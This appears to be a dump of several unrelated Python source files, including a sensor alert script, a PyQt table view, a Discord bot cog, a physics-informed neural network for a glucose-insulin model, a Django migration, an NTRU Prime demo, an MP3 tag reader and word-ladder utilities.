net_id = networks[net_name]
org_id = networks_to_organizations[net_id]
serials = sensors_to_profiles[profile_name]
alert_profile_details = {
"name": profile_name,
"scheduleId": "",
"conditions": [
{
"type": "temperature",
"unit": "fahrenheit",
"direction": "+",
"threshold": temp_threshold,
"duration": temp_duration
}
],
"recipients": {
"emails": profiles_to_recipients[net_name][profile_name],
"snmp": False,
"allAdmins": False,
"smsNumbers": [],
"httpServerIds": [],
"pushUserIds": []
},
"serials": serials
}
status_code = createAlertProfile(base_url, headers, net_id, alert_profile_details)
if status_code != 201:
print("Error {}".format(status_code))
print("There was an issue creating the alert profile: {} to the network with ID {}".format(alert_profile_details, net_id))
print("Alert profile {} was added to the network {}".format(profile_name, net_name))
alert_profile_file.close()
| 6,253 | 1,827 |
from PyQt4.QtGui import *
from PyQt4.QtCore import *
class MyTabView(QTableView):
def __init__(self, parent=None):
super(MyTabView, self).__init__(parent)
self.model = QStandardItemModel(4, 2)
self.setModel(self.model)
def mouseDoubleClickEvent(self, event):
QTableView.mouseDoubleClickEvent(self, event)
pos = event.pos()
item = self.indexAt(pos)
if item:
print ("item clicked at ", item.row(), " ", item.column())
if __name__ == '__main__':
import sys
app = QApplication(sys.argv)
w = QWidget()
w.resize(1024, 768)
v = MyTabView(w)
w.show()
app.exec_() | 663 | 230 |
import logging
from itertools import cycle
import discord
from discord.ext import commands, tasks
from pyboss.controllers.guild import GuildController
from .utils import youtube
from .utils.checkers import is_guild_owner
logger = logging.getLogger(__name__)
class Commands(commands.Cog):
def __init__(self, bot):
self.bot = bot
self.status = cycle((discord.Game(name=f"{bot.command_prefix}help"),))
@commands.command(aliases=["status"])
@commands.guild_only()
@is_guild_owner()
async def change_status(self, ctx, *params):
"""
Change le status du bot par des vidéos correspondantes à la recherche
"""
query = " ".join(params)
videos = []
for video in youtube.search(query, n=50):
videos.append(discord.Streaming(**video))
if len(videos) > 0:
self.status = cycle(videos)
else:
ctx.send("Aucune vidéo n'a été trouvée")
@tasks.loop(seconds=30)
async def loop_status(self):
try:
await self.bot.change_presence(activity=next(self.status))
except discord.errors.HTTPException:
logger.error("Can't change bot presence")
@commands.Cog.listener("on_ready")
async def before_loop_status(self):
self.loop_status.start()
@commands.command()
@commands.guild_only()
async def clear(self, ctx, n=1):
"""
Supprime les n message du salon
"""
await ctx.channel.purge(limit=int(n) + 1)
@commands.command()
@commands.guild_only()
async def send(self, ctx, *params):
"""
Envoie un message dans le salon actuel
"""
await ctx.send(" ".join(params))
await ctx.message.delete()
@commands.command()
@commands.guild_only()
async def profile(self, ctx, mention=None):
"""
Consulter les infos d'un membre
"""
id = mention.strip("<>!?@&") if mention else ctx.author.id
if not id.isdigit():
await ctx.send(f"{mention} est incorrect")
elif member := GuildController(ctx.guild).get_member_by_id(int(id)):
embed = discord.Embed(title="Profil", colour=0xFFA325)
embed.set_author(name=member.name)
embed.set_thumbnail(url=member.avatar_url)
embed.add_field(name="Name", value=member.mention, inline=True)
embed.add_field(name="Level", value=member.level, inline=True)
embed.add_field(name="XP", value=member.XP, inline=True)
embed.add_field(
name="Membre depuis...",
value=f"{member.joined_at:%d/%m/%Y}",
inline=True,
)
await ctx.send(embed=embed)
# TODO: add embed_send command and LaTeX command like Texit bot
def setup(bot):
bot.add_cog(Commands(bot))
| 2,868 | 893 |
import tensorflow as tf
import numpy as np
from scipy.integrate import odeint
import matplotlib.pyplot as plt
from plotting import newfig, savefig
import matplotlib.gridspec as gridspec
import seaborn as sns
import time
from utilities import neural_net, fwd_gradients, heaviside, \
tf_session, mean_squared_error, relative_error
class HiddenPathways:
# Initialize the class
def __init__(self, t_data, S_data, t_eqns, layers, meal_tq):
self.D = S_data.shape[1]
self.t_min = t_data.min(0)
self.t_max = t_data.max(0)
# self.S_scale = tf.Variable(np.array(self.D*[1.0]), dtype=tf.float32, trainable=False)
self.S_scale = S_data.std(0)
# data on all the species (only some are used as input)
self.t_data, self.S_data = t_data, S_data
self.t_eqns = t_eqns
# layers
self.layers = layers
self.mt = 2.0*(meal_tq[0] - self.t_min)/(self.t_max - self.t_min) - 1.0
self.mq = meal_tq[1]
# self.k = tf.Variable(1.0/120.0, dtype=tf.float32, trainable=False)
self.Rm = tf.Variable(209.0/100.0, dtype=tf.float32, trainable=False)
self.Vg = tf.Variable(10.0, dtype=tf.float32, trainable=False)
self.C1 = tf.Variable(300.0/100.0, dtype=tf.float32, trainable=False)
self.a1 = tf.Variable(6.6, dtype=tf.float32, trainable=False)
# self.Ub = tf.Variable(72.0/100.0, dtype=tf.float32, trainable=False)
# self.C2 = tf.Variable(144.0/100.0, dtype=tf.float32, trainable=False)
# self.U0 = tf.Variable(4.0/100.0, dtype=tf.float32, trainable=False)
# self.Um = tf.Variable(90.0/100.0, dtype=tf.float32, trainable=False)
# self.C3 = tf.Variable(100.0/100.0, dtype=tf.float32, trainable=False)
# self.C4 = tf.Variable(80.0/100.0, dtype=tf.float32, trainable=False)
self.Vi = tf.Variable(11.0, dtype=tf.float32, trainable=False)
self.E = tf.Variable(0.2, dtype=tf.float32, trainable=False)
self.ti = tf.Variable(100.0, dtype=tf.float32, trainable=False)
# self.beta = tf.Variable(1.772, dtype=tf.float32, trainable=False)
# self.Rg = tf.Variable(180.0/100.0, dtype=tf.float32, trainable=False)
# self.alpha = tf.Variable(7.5, dtype=tf.float32, trainable=False)
self.Vp = tf.Variable(3.0, dtype=tf.float32, trainable=False)
# self.C5 = tf.Variable(26.0/100.0, dtype=tf.float32, trainable=False)
self.tp = tf.Variable(6.0, dtype=tf.float32, trainable=False)
# self.td = tf.Variable(12.0, dtype=tf.float32, trainable=False)
self.logk = tf.Variable(-6.0, dtype=tf.float32, trainable=True)
# self.logRm = tf.Variable(0.0, dtype=tf.float32, trainable=True)
# self.logVg = tf.Variable(0.0, dtype=tf.float32, trainable=True)
# self.logC1 = tf.Variable(0.0, dtype=tf.float32, trainable=True)
# self.loga1 = tf.Variable(0.0, dtype=tf.float32, trainable=True)
self.logUb = tf.Variable(0.0, dtype=tf.float32, trainable=True)
self.logC2 = tf.Variable(0.0, dtype=tf.float32, trainable=True)
self.logU0 = tf.Variable(0.0, dtype=tf.float32, trainable=True)
self.logUm = tf.Variable(0.0, dtype=tf.float32, trainable=True)
self.logC3 = tf.Variable(0.0, dtype=tf.float32, trainable=True)
self.logC4 = tf.Variable(0.0, dtype=tf.float32, trainable=True)
# self.logVi = tf.Variable(0.0, dtype=tf.float32, trainable=True)
# self.logE = tf.Variable(0.0, dtype=tf.float32, trainable=True)
# self.logti = tf.Variable(0.0, dtype=tf.float32, trainable=True)
self.logbeta = tf.Variable(0.0, dtype=tf.float32, trainable=True)
self.logRg = tf.Variable(0.0, dtype=tf.float32, trainable=True)
self.logalpha = tf.Variable(0.0, dtype=tf.float32, trainable=True)
# self.logVp = tf.Variable(0.0, dtype=tf.float32, trainable=True)
self.logC5 = tf.Variable(0.0, dtype=tf.float32, trainable=True)
# self.logtp = tf.Variable(0.0, dtype=tf.float32, trainable=True)
self.logtd = tf.Variable(0.0, dtype=tf.float32, trainable=True)
self.var_list_eqns = [self.logk, self.logUb,
self.logC2, self.logU0, self.logUm, self.logC3, self.logC4,
self.logbeta, self.logRg, self.logalpha, self.logC5,
self.logtd]
self.k = tf.exp(self.logk)
# self.Rm = tf.exp(self.logRm)
# self.Vg = tf.exp(self.logVg)
# self.C1 = tf.exp(self.logC1)
# self.a1 = tf.exp(self.loga1)
self.Ub = tf.exp(self.logUb)
self.C2 = tf.exp(self.logC2)
self.U0 = tf.exp(self.logU0)
self.Um = tf.exp(self.logUm)
self.C3 = tf.exp(self.logC3)
self.C4 = tf.exp(self.logC4)
# self.Vi = tf.exp(self.logVi)
# self.E = tf.exp(self.logE)
# self.ti = tf.exp(self.logti)
self.beta = tf.exp(self.logbeta)
self.Rg = tf.exp(self.logRg)
self.alpha = tf.exp(self.logalpha)
# self.Vp = tf.exp(self.logVp)
self.C5 = tf.exp(self.logC5)
# self.tp = tf.exp(self.logtp)
self.td = tf.exp(self.logtd)
# placeholders for data
self.t_data_tf = tf.placeholder(tf.float32, shape=[None, 1])
self.S_data_tf = tf.placeholder(tf.float32, shape=[None, self.D])
self.t_eqns_tf = tf.placeholder(tf.float32, shape=[None, 1])
self.mt_tf = tf.placeholder(tf.float32, shape=[None, self.mt.shape[1]])
self.mq_tf = tf.placeholder(tf.float32, shape=[None, self.mq.shape[1]])
self.learning_rate = tf.placeholder(tf.float32, shape=[])
# physics uninformed neural networks
self.net_sysbio = neural_net(layers=self.layers)
self.H_data = 2.0*(self.t_data_tf - self.t_min)/(self.t_max - self.t_min) - 1.0
self.S_data_pred = self.S_data[0,:] + self.S_scale*(self.H_data+1.0)*self.net_sysbio(self.H_data)
# physics informed neural networks
self.H_eqns = 2.0*(self.t_eqns_tf - self.t_min)/(self.t_max - self.t_min) - 1.0
self.S_eqns_pred = self.S_data[0,:] + self.S_scale*(self.H_eqns+1.0)*self.net_sysbio(self.H_eqns)
self.E_eqns_pred, self.IG = self.SysODE(self.S_eqns_pred, self.t_eqns_tf,
self.H_eqns, self.mt_tf, self.mq_tf)
# Adaptive S_scale
# self.S_scale = 0.9*self.S_scale + 0.1*tf.math.reduce_std(self.S_eqns_pred, 0)
# scale_list = tf.unstack(self.S_scale)
# scale_list[2] = self.S_data.std(0)[2]
# self.S_scale = tf.stack(scale_list)
# loss
self.loss_data = mean_squared_error(self.S_data_tf[:,2:3]/self.S_scale[2:3], self.S_data_pred[:,2:3]/self.S_scale[2:3])
self.loss_eqns = mean_squared_error(0.0, self.E_eqns_pred/self.S_scale)
self.loss_auxl = mean_squared_error(self.S_data_tf[-1,:]/self.S_scale, self.S_data_pred[-1,:]/self.S_scale)
self.loss = 0.99*self.loss_data + 0.01*self.loss_eqns + 0.01*self.loss_auxl
# optimizers
self.optimizer = tf.train.AdamOptimizer(learning_rate=self.learning_rate)
self.optimizer_para = tf.train.AdamOptimizer(learning_rate=0.001)
self.train_op = self.optimizer.minimize(self.loss,
var_list=[self.net_sysbio.weights,
self.net_sysbio.biases,
self.net_sysbio.gammas])
self.trainpara_op = self.optimizer_para.minimize(self.loss,
var_list=self.var_list_eqns)
self.sess = tf_session()
def SysODE(self, S, t, H, mt, mq):
intake = self.k * mq * heaviside(H-mt) * tf.exp(self.k*(mt-H)*(self.t_max-self.t_min)/2.0)
IG = tf.reduce_sum(intake, axis=1, keepdims=True)
kappa = 1.0/self.Vi + 1.0/(self.E*self.ti)
f1 = self.Rm * tf.sigmoid(S[:,2:3]/(self.Vg*self.C1) - self.a1)
f2 = self.Ub * (1.0 - tf.exp(-S[:,2:3]/(self.Vg*self.C2)))
safe_log = tf.where(S[:,1:2] <= 0.0, tf.ones_like(S[:,1:2]), S[:,1:2])
f3 = (self.U0 + self.Um*tf.sigmoid(self.beta*tf.log(kappa*safe_log/self.C4))) / (self.Vg*self.C3)
f4 = self.Rg * tf.sigmoid(-self.alpha*(S[:,5:6]/(self.Vp*self.C5)-1.0))
F0 = f1 - self.E*(S[:,0:1]/self.Vp-S[:,1:2]/self.Vi) - S[:,0:1]/self.tp
F1 = self.E*(S[:,0:1]/self.Vp-S[:,1:2]/self.Vi) - S[:,1:2]/self.ti
F2 = f4 + IG - f2 - f3*S[:,2:3]
F3 = (S[:,0:1] - S[:,3:4]) / self.td
F4 = (S[:,3:4] - S[:,4:5]) / self.td
F5 = (S[:,4:5] - S[:,5:6]) / self.td
F = tf.concat([F0, F1, F2, F3, F4, F5], 1)
S_t = fwd_gradients(S, t)
E = S_t - F
return E, IG
def train(self, num_epochs, batch_size, learning_rate):
N_data = self.t_data.shape[0]
N_eqns = self.t_eqns.shape[0]
for epoch in range(num_epochs):
start_time = time.time()
for it in range(N_eqns//batch_size):
idx_data = np.concatenate([np.array([0]),
np.random.choice(np.arange(1, N_data-1), min(batch_size, N_data)-2),
np.array([N_data-1])])
idx_eqns = np.random.choice(N_eqns, batch_size)
t_data_batch, S_data_batch = self.t_data[idx_data,:], self.S_data[idx_data,:]
t_eqns_batch = self.t_eqns[idx_eqns,:]
mt_batch, mq_batch = self.mt[idx_eqns,:], self.mq[idx_eqns,:]
tf_dict = {self.t_data_tf: t_data_batch,
self.S_data_tf: S_data_batch,
self.t_eqns_tf: t_eqns_batch,
self.mt_tf: mt_batch, self.mq_tf: mq_batch,
self.learning_rate: learning_rate}
self.sess.run([self.train_op, self.trainpara_op], tf_dict)
# Print
if it % 10 == 0:
elapsed = time.time() - start_time
[loss_data_value,
loss_eqns_value,
loss_auxl_value,
learning_rate_value] = self.sess.run([self.loss_data,
self.loss_eqns,
self.loss_auxl,
self.learning_rate], tf_dict)
print('Epoch: %d, It: %d, Loss Data: %.3e, Loss Eqns: %.3e, Loss Aux: %.3e, Time: %.3f, Learning Rate: %.1e'
%(epoch, it, loss_data_value, loss_eqns_value, loss_auxl_value, elapsed, learning_rate_value))
start_time = time.time()
def predict(self, t_star, meal_tq):
meal_tq[0] = 2.0*(meal_tq[0] - self.t_min)/(self.t_max - self.t_min) - 1.0
tf_dict = {self.t_eqns_tf: t_star,
self.mt_tf: meal_tq[0], self.mq_tf: meal_tq[1]}
S_star, IG = self.sess.run([self.S_eqns_pred, self.IG], tf_dict)
S_star = np.append(S_star[:,:], IG[:], axis=1)
return S_star
if __name__ == "__main__":
layers = [1] + 6*[6*30] + [6]
meal_t = [300., 650., 1100., 2000.]
meal_q = [60e3, 40e3, 50e3, 100e3]
def intake(tn, k):
def s(mjtj):
return k*mjtj[1]*np.heaviside(tn-mjtj[0], 0.5)*np.exp(k*(mjtj[0]-tn))
IG = np.array([s(mjtj) for mjtj in list(zip(meal_t, meal_q))]).sum()
return IG
# function that returns dx/dt
def f(x, t): # x is 6 x 1
k = 1./120.
Rm = 209.
Vg = 10.
C1 = 300.
a1 = 6.6
Ub = 72.
C2 = 144.
U0 = 4.
Um = 90.
C3 = 100.
C4 = 80.
Vi = 11.
E = 0.2
ti = 100.
beta = 1.772
Rg = 180.
alpha = 7.5
Vp = 3.
C5 = 26.
tp = 6.
td = 12.
kappa = 1.0/Vi + 1.0/E/ti
f1 = Rm / (1.0 + np.exp(-x[2]/Vg/C1 + a1))
f2 = Ub * (1.0 - np.exp(-x[2]/Vg/C2))
f3 = (U0 + Um/(1.0+np.exp(-beta*np.log(kappa*x[1]/C4)))) / Vg / C3
f4 = Rg / (1.0 + np.exp(alpha*(x[5]/Vp/C5-1.0)))
x0 = f1 - E*(x[0]/Vp-x[1]/Vi) - x[0]/tp
x1 = E*(x[0]/Vp-x[1]/Vi) - x[1]/ti
x2 = f4 + intake(t, k) - f2 - f3*x[2]
x3 = (x[0] - x[3]) / td
x4 = (x[3] - x[4]) / td
x5 = (x[4] - x[5]) / td
X = np.array([x0, x1, x2, x3, x4, x5])
return X
# function that returns dx/dt
def f_pred(x, t): # x is 6 x 1
k = 0.007751
Rm = 73.858517
Vg = 10.000000
C1 = 319.160032
a1 = 6.253946
Ub = 86.824888
C2 = 152.637362
U0 = 19.412358
Um = 141.051173
C3 = 235.955381
C4 = 251.580667
Vi = 2.689281
E = 0.147199
ti = 36.766254
beta = 2.475349
Rg = 212.777472
alpha = 7.182466
Vp = 0.707807
C5 = 101.811242
tp = 139.384628
td = 7.417875
kappa = 1.0/Vi + 1.0/E/ti
f1 = Rm / (1.0 + np.exp(-x[2]/Vg/C1 + a1))
f2 = Ub * (1.0 - np.exp(-x[2]/Vg/C2))
f3 = (U0 + Um/(1.0+np.exp(-beta*np.log(kappa*x[1]/C4)))) / Vg / C3
f4 = Rg / (1.0 + np.exp(alpha*(x[5]/Vp/C5-1.0)))
x0 = f1 - E*(x[0]/Vp-x[1]/Vi) - x[0]/tp
x1 = E*(x[0]/Vp-x[1]/Vi) - x[1]/ti
x2 = f4 + intake(t, k) - f2 - f3*x[2]
x3 = (x[0] - x[3]) / td
x4 = (x[3] - x[4]) / td
x5 = (x[4] - x[5]) / td
X = np.array([x0, x1, x2, x3, x4, x5])
return X
def plotting(t_star, S_star, S_pred, perm, Vg2, forecast=False):
sns.set()
fig, ax = newfig(2.0, 0.7)
gs0 = gridspec.GridSpec(1, 1)
gs0.update(top=0.9, bottom=0.15, left=0.1, right=0.95, hspace=0.3, wspace=0.3)
ax = plt.subplot(gs0[0:1, 0:1])
ax.plot(t_star,S_star[:,2],'C1',linewidth=2,label='input data')
ax.scatter(t_star[perm],S_star[perm,2],marker='o',s=40,label='sampled input')
ax.set_xlabel('$t\ (min)$', fontsize=18)
ax.set_ylabel('$G\ (mg/dl) $', fontsize=18)
ax.legend(fontsize='large')
####################################
fig, ax = newfig(1.8, 0.75)
gs1 = gridspec.GridSpec(1, 2)
gs1.update(top=0.85, bottom=0.15, left=0.1, right=0.95, hspace=0.3, wspace=0.3)
ax = plt.subplot(gs1[0:1, 0:1])
ax.plot(t_star,S_star[:,0]*Vg2,'C1',linewidth=2,label='exact')
ax.plot(t_star,S_pred[:,0]*Vg2,'g-.',linewidth=3,label='learned')
ax.set_xlabel('$t\ (min)$', fontsize=18)
ax.set_ylabel('$I_p\ (\mu U/ml)$', fontsize=18)
ax.legend(fontsize='large')
ax = plt.subplot(gs1[0:1, 1:2])
ax.plot(t_star,S_star[:,1]*Vg2,'C1',linewidth=2)
ax.plot(t_star,S_pred[:,1]*Vg2,'g-.',linewidth=3)
ax.set_xlabel('$t\ (min)$', fontsize=18)
ax.set_ylabel('$I_i\ (\mu U/ml)$', fontsize=18)
fig, ax = newfig(1.8, 0.75)
gs2 = gridspec.GridSpec(1, 2)
gs2.update(top=0.85, bottom=0.15, left=0.1, right=0.95, hspace=0.3, wspace=0.3)
ax = plt.subplot(gs2[0:1, 0:1])
if not forecast:
ax.scatter(t_star[perm],S_star[perm,2],marker='o',c='C1',s=30)
else:
ax.plot(t_star,S_star[:,2],'C1',linewidth=2)
ax.plot(t_star,S_pred[:,2],'g-.',linewidth=3)
ax.set_xlabel('$t\ (min)$', fontsize=18)
ax.set_ylabel('$G\ (mg/dl)$', fontsize=18)
ax = plt.subplot(gs2[0:1, 1:2])
ax.plot(t_star,IG_star*Vg2,'C1',linewidth=2)
ax.plot(t_star,S_pred[:,6]*Vg2,'g-.',linewidth=3)
ax.set_xlabel('$t\ (min)$', fontsize=18)
ax.set_ylabel('$I_G\ (mg/min)$', fontsize=18)
# time points
t_star = np.arange(0, 3000, 1.0)
N = t_star.shape[0]
N_eqns = N
N_data = N // 5
k = 1./120.
Vp = 3.0
Vi = 11.0
Vg2 = 10.0*10.0
S0 = 12.0*Vp
S1 = 4.0*Vi
S2 = 110.0*Vg2
S3 = 0.0
S4 = 0.0
S5 = 0.0
# initial condition
x0 = np.array([S0, S1, S2, S3, S4, S5]).flatten()
# solve ODE
S_star = odeint(f, x0, t_star)
S_star /= Vg2 # scaling by Vg^2
IG_star = np.array([intake(t, k) for t in t_star]) / Vg2
t_train = t_star[:,None]
S_train = S_star
# two-point data must be given for all the species
# 1st: initial at t=0; 2nd: any point between (0,T]
N0 = 0
N1 = N - 1
idx_data = np.concatenate([np.array([N0]),
np.random.choice(np.arange(1, N-1), size=N_data, replace=False),
np.array([N-1]),
np.array([N1])])
idx_eqns = np.concatenate([np.array([N0]),
np.random.choice(np.arange(1, N-1), size=N_eqns-2, replace=False),
np.array([N-1])])
meal_tq = [np.array([N_eqns*[x] for x in meal_t]).T,
np.array([N_eqns*[x/Vg2] for x in meal_q]).T]
model = HiddenPathways(t_train[idx_data],
S_train[idx_data,:],
t_train[idx_eqns],
layers,
meal_tq)
model.train(num_epochs=25000, batch_size=N_eqns, learning_rate=1e-3)
model.train(num_epochs=25000, batch_size=N_eqns, learning_rate=1e-4)
model.train(num_epochs=10000, batch_size=N_eqns, learning_rate=1e-5)
# NN prediction
meal_tq = [np.array([N*[x] for x in meal_t]).T,
np.array([N*[x/Vg2] for x in meal_q]).T]
S_pred = model.predict(t_star[:,None], meal_tq)
plotting(t_star, S_star, S_pred, idx_data, Vg2)
print('k = %.6f' % ( model.sess.run(model.k) ) )
print('Rm = %.6f' % ( model.sess.run(model.Rm)*Vg2 ) )
print('Vg = %.6f' % ( model.sess.run(model.Vg) ) )
print('C1 = %.6f' % ( model.sess.run(model.C1)*Vg2 ) )
print('a1 = %.6f' % ( model.sess.run(model.a1) ) )
print('Ub = %.6f' % ( model.sess.run(model.Ub)*Vg2 ) )
print('C2 = %.6f' % ( model.sess.run(model.C2)*Vg2 ) )
print('U0 = %.6f' % ( model.sess.run(model.U0)*Vg2 ) )
print('Um = %.6f' % ( model.sess.run(model.Um)*Vg2 ) )
print('C3 = %.6f' % ( model.sess.run(model.C3)*Vg2 ) )
print('C4 = %.6f' % ( model.sess.run(model.C4)*Vg2 ) )
print('Vi = %.6f' % ( model.sess.run(model.Vi) ) )
print('E = %.6f' % ( model.sess.run(model.E) ) )
print('ti = %.6f' % ( model.sess.run(model.ti) ) )
print('beta = %.6f' % ( model.sess.run(model.beta) ) )
print('Rg = %.6f' % ( model.sess.run(model.Rg)*Vg2 ) )
print('alpha = %.6f' % ( model.sess.run(model.alpha) ) )
print('Vp = %.6f' % ( model.sess.run(model.Vp) ) )
print('C5 = %.6f' % ( model.sess.run(model.C5)*Vg2 ) )
print('tp = %.6f' % ( model.sess.run(model.tp) ) )
print('td = %.6f' % ( model.sess.run(model.td) ) )
# Prediction based on inferred parameters
# k = 0.007751
# Vp = 0.707807
# Vi = 2.689281
# S0 = 12.0*Vp
# S1 = 4.0*Vi
# S2 = 110.0*Vg2
# S3 = 0.0
# S4 = 0.0
# S5 = 0.0
# x0 = np.array([S0, S1, S2, S3, S4, S5]).flatten()
# S_pred = odeint(f_pred, x0, t_star)
# S_pred /= Vg2
# IG_pred = np.array([intake(t, k) for t in t_star]) / Vg2
# S_pred = np.append(S_pred[:,:], IG_pred[:,None], axis=1)
# plotting(t_star, S_star, S_pred, idx_data, Vg2, forecast=True)
# savefig('./figures/Glycolytic', crop = False) | 19,860 | 8,654 |
# Generated by Django 3.1.2 on 2020-11-12 06:53
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('food_items', '0001_initial'),
]
operations = [
migrations.RemoveField(
model_name='category',
name='products',
),
migrations.RemoveField(
model_name='store',
name='products',
),
migrations.AddField(
model_name='product',
name='categories',
field=models.ManyToManyField(to='food_items.Category'),
),
migrations.AddField(
model_name='product',
name='stores',
field=models.ManyToManyField(to='food_items.Store'),
),
]
| 775 | 230 |
from ciphers import StreamlinedNTRUPrime
# choose your parameters
p, q, w = 761, 4591, 286
print('Streamlined NTRU Prime Example for', f'p={p}, q={q}, w={w}')
print('-' * 50)
cipher = StreamlinedNTRUPrime(p, q, w, seed=1337)
print('Generating key pair ... ')
pk, sk = cipher.generate_keys()
print('En/decrypting...')
message = cipher.random_small_poly(w, None, cipher.modulus_r)
assert message == cipher.decrypt(cipher.encrypt(message, pk), sk), 'En/decryption failed.'
print('Successfully en/decrypted.')
| 511 | 204 |
# -*- coding: utf-8 -*-
import os, sys, shutil, re
def trip_space(s):
while len(s) > 0 and s[-1] == '\x00':
s = s[:-1]
## while len(s) > 0 and s[:2] == b'\x00\x00':
## s = s[2:]
return s
def _print(*args):
try:
for arg in args:
print arg,
print '\n'
except UnicodeEncodeError as msg:
print 'Error to print', args, msg
# ID3V2, ID3V3
class MP3:
def __init__(self, filepath):
self.filepath = filepath
f = open(filepath, 'rb')
self.data = f.read()
f.close()
self.tags = {} # tags
try:
self.read_header()
self.read_id_frame()
except:
pass
def read_header(self):
data = self.data
self.Header = data[:3] #ID3
self.Ver = ord(data[3:4])
self.Revision = ord(data[4:5])
self.Flag = ord(data[5:6])
Size = data[6:10]
self.total_size = (ord(Size[0])&0x7F)*0x200000+ (ord(Size[1] or 0)&0x7F)*0x400 + (ord(Size[2] or 0)&0x7F)*0x80 +(ord(Size[3] or 0)&0x7F)
#print "Header=%s, Ver=%s, Revision=%s, Flag=%s, Size=%s\n" %(self.Header, self.Ver, self.Revision, self.Flag, self.total_size)
def read_id_frame(self):
data = self.data
#if self.Ver == 2:
cur_index = 10
max_index = self.total_size
while cur_index < self.total_size:
FrameID = data[cur_index:cur_index+4]
FrameSize = data[cur_index+4:cur_index+8]
FSize = ord(FrameSize[0])*0x100000000 + ord(FrameSize[1])*0x10000+ ord(FrameSize[2])*0x100 + ord(FrameSize[3])
FrameFlags = data[cur_index+8:cur_index+10]
# Refers to http://blog.sina.com.cn/s/blog_80ab598b0102vbao.html
# decoding tag info.
if FrameID != 'APIC':
info = data[cur_index+10:cur_index+10+FSize]
try:
st = info.rfind(b'\xff\xfe')
if st != -1: # \x01\xff\xfe.....\xff\xfe
#print FrameID, r'\x01\xff\xfe', FSize
self.tags[FrameID] = trip_space(info[st+2:].decode('utf16'))
elif info.startswith(b'\x03'):
self.tags[FrameID] = trip_space(info[1:].decode())
else: #\x00
#print FrameID, 'decode gbk'
self.tags[FrameID] = info[1:-1].replace(b'\x00',b'\x20').decode('gbk')
except UnicodeDecodeError as msg:
#print('Decode Error @%s, Content is %s\nMsg:%s'%(kind,info, msg))
pass
cur_index += 10 + FSize
def is_valid(self):
return self.Header == 'ID3'
def title(self):
return self.tags.get('TIT2') or os.path.basename(self.filepath).split('.')[0]
if __name__ == '__main__':
if len(sys.argv) < 3:
print 'Usage: %s [cache folder] [output_folder]' %sys.argv[0]
sys.exit(0)
input_dir = sys.argv[1]
output_dir = sys.argv[2]
if not os.path.isdir(output_dir):
os.mkdir(output_dir)
files = os.listdir(input_dir)
for file in files:
src_path = os.path.join(input_dir, file)
if os.path.isdir(src_path): continue # don't process directory
mp3 = MP3(src_path)
if mp3.is_valid():
title = mp3.title()
title_repl = re.sub('[\\\/\:\*\?"<>|]', '_', title)
dest_path = os.path.join(output_dir, title_repl+'.mp3')
_print(src_path, '>>', dest_path)
shutil.copy(src_path, dest_path)
| 3,721 | 1,452 |
from typing import Dict, Iterable, Iterator, List, Sequence, Optional, Tuple
from word_ladder.types import WordDict
from word_ladder.rung import Rung
def get_word_with_letter_missing(word: str, position: int) -> str:
"""
>>> get_word_with_letter_missing('dog', 0)
'?og'
>>> get_word_with_letter_missing('dog', 1)
'd?g'
>>> get_word_with_letter_missing('dog', 2)
'do?'
"""
if position == 0:
return f'?{word[1:]}'
if position == len(word) - 1:
return f'{word[:-1]}?'
return f'{word[:position]}?{word[position + 1:]}'
def get_neighbors(word: str, words: WordDict) -> Sequence[str]:
"""
>>> words = {'?og': ['dog', 'log', 'fog'], 'd?g': ['dog', 'dig'], 'do?': ['dog'], 'l?g': ['log'], 'lo?': ['log']}
>>> sorted(get_neighbors('dig', words))
['dig', 'dog']
>>> sorted(get_neighbors('fog', words))
['dog', 'fog', 'log']
"""
return frozenset(
neighbor
for position in range(len(word))
for neighbor in words.get(get_word_with_letter_missing(word, position), [])
)
def get_all_previous_words(rung: Rung) -> Tuple[str]:
"""
>>> rung_0 = Rung(None, ['dig'], {})
>>> path = {'dog': ('log', 'fog', 'dig', 'dug', 'don', 'dob'), 'fig': ('dig', 'fog', 'fin')}
>>> words = ['dob', 'don', 'dug', 'fin', 'fog', 'log']
>>> rung_1 = Rung(rung_0, words, path)
>>> sorted(get_all_previous_words(rung_1))
['dig', 'dob', 'don', 'dug', 'fin', 'fog', 'log']
"""
return tuple(rung.words) + (get_all_previous_words(rung.previous) if rung.previous else ())
def get_next_rung(previous_rung: Rung, words: WordDict) -> Rung:
"""
>>> from word_ladder.compile_words import add_to_words_dict
>>> words = {}
>>> for w in ['dog', 'log', 'fog', 'dig', 'dug', 'dim', 'don', 'dob', 'lug', 'fin']:
... words = add_to_words_dict(words, w)
>>> rung = Rung(None, ['dog', 'fig'], {})
>>> next_rung = get_next_rung(rung, words)
>>> {k: sorted(v) for k,v in next_rung.path.items()}
{'dog': ['dig', 'dob', 'don', 'dug', 'fog', 'log'], 'fig': ['dig', 'fin', 'fog']}
>>> sorted(next_rung.words)
['dig', 'dob', 'don', 'dug', 'fin', 'fog', 'log']
"""
previous_words = get_all_previous_words(previous_rung)
path = {
source_word: tuple(w for w in get_neighbors(source_word, words) if w not in previous_words)
for source_word in previous_rung.words
}
word_soup = frozenset(w for these_words in path.values() for w in these_words)
return Rung(previous_rung, word_soup, path)
def keys_for_value(d: Dict[str, Iterable[str]], value: str) -> Iterator[str]:
"""
>>> d = {'a': ['x', 'y', 'z'], 'b': ['l', 'm', 'z'], 'c': ['t', 'u']}
>>> list(keys_for_value(d, 'y'))
['a']
>>> list(keys_for_value(d, 'u'))
['c']
>>> list(keys_for_value(d, 'z'))
['a', 'b']
"""
for key, values in d.items():
if value in values:
yield key
def get_ladders(rung: Rung, word: str) -> Sequence[List[str]]:
"""
>>> rung_0 = Rung(None, ['dig'], {})
>>> rung_1 = Rung(rung_0, ['dog', 'log', 'fig', 'din'], {'dig': ('dog', 'log', 'fig', 'din')})
>>> words = ['dig', 'dob', 'don', 'dug', 'fin', 'fog', 'log', 'din']
>>> path = {'dog': ('log', 'fog', 'dig', 'dug', 'don', 'dob'), 'fig': ('dig', 'fog', 'fin'), 'din': ('dig', 'fin')}
>>> rung_2 = Rung(rung_1, words, path)
>>> get_ladders(rung_2, 'fin')
[['dig', 'fig', 'fin'], ['dig', 'din', 'fin']]
"""
if not rung.previous:
return [[word]]
return [
ladder + [word]
for previous_word in keys_for_value(rung.path, word)
for ladder in get_ladders(rung.previous, previous_word)
]
def build_rungs(start_word, target_word, words) -> Rung:
rung = Rung(None, [start_word], {})
counter = 1
while target_word not in rung.words and len(rung.words) > 0:
rung = get_next_rung(rung, words)
counter += 1
if rung.words:
print(f'Round {counter}: {len(rung.words):3} possible words, eg. {", ".join(sorted(rung.words)[:6])}')
return rung
| 4,123 | 1,594 |
"""Package init file.
